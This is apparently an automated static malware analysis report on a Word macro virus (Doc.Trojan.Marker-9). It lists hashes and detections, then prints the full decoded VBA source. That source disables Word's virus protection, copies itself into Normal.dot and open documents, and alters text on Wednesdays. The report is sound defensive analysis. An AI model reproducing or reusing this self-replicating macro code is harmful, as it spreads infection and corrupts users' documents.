Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2537488faa8c3d7f…

MALICIOUS

Office (OLE)

Size: 35.0 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 17fafafedf5bad755fddadfa11055d89
SHA-1: d8cccb0de35e60936c1bfbf56c182d1251fa32ac
SHA-256: 2537488faa8c3d7f94012a64409c2a364e95728eb3a64fcf3caa231b0c0edea3
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV and contains VBA macros. The macro code attempts to infect the Normal.dot template by copying its own code into it, and also sets the 'WallPaper' registry value under HKEY_CURRENT_USER\Control Panel\Desktop to 'c:\NetSetup.log'. This is consistent with macro malware that persists through the global template and spreads to other documents.

Heuristics (2)

  • ClamAV: Doc.Trojan.Marker-9 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Marker-9
  • VBA macros detected [medium, OLE_VBA_MACROS]
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2186 bytes
SHA-256: 85894b3fcc57d426c01d511b8a945d63047810c0a4195fd18f575e200131fba7
Detection: ClamAV: Doc.Trojan.Marker-9
Obfuscation or payload: unlikely

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next

If (WeekDay(Now()) = vbWednesday) Then
    Application.ScreenUpdating = False
    ActiveWindow.WindowState = wdWindowStateMinimize
End If

Const Kuku = "Black Wednesday!"

'Declare Variables
Dim SaveDoc, SaveNormalTempl, DocInfected, NormalTemplInfected As Boolean
Dim ActDoc, NormTempl As Object
Dim MyCod, UserAddress, LogData, LogFile As String
Dim a1, FileLocal, FileServer As Integer

'Initialize Variables
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormTempl = NormalTemplate.VBProject.VBComponents.Item(1)

DocInfected = ActDoc.CodeModule.Find(Kuku, 1, 1, 10000, 10000)
NormalTemplInfected = NormTempl.CodeModule.Find(Kuku, 1, 1, 10000, 10000)

'Switch the VirusProtection OFF
Options.VirusProtection = False

System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", _
"WallPaper") = "c:\NetSetup.log"

If (WeekDay(Now()) = vbWednesday) Then
    Selection.MoveDown Unit:=wdLine, Count:=20, Extend:=wdExtend
    Selection.Range.Case = wdNextCase
    ActiveDocument.Save
End If
'Make sure that some conditions are true before we continue infecting anything
If (DocInfected = True Xor NormalTemplInfected = True) Then
  'Infect the NormalTemplate
  If DocInfected = True Then
 
    MyCod = ActDoc.CodeModule.Lines(1, ActDoc.CodeModule.CountOfLines)

    a1 = NormTempl.CodeModule.CountOfLines
    NormTempl.CodeModule.DeleteLines 1, a1
    NormTempl.CodeModule.AddFromString MyCod
    
    NormalTemplate.Save
  End If
              
  'Infect the ActiveDocument
  If NormalTemplInfected = True Then

    OurCode = NormTempl.CodeModule.Lines(1, NormTempl.CodeModule.CountOfLines)

    a1 = ActDoc.CodeModule.CountOfLines
    ActDoc.CodeModule.DeleteLines 1, a1
    ActDoc.CodeModule.AddFromString OurCode
    
    ActiveDocument.Save
  End If
End If
End Sub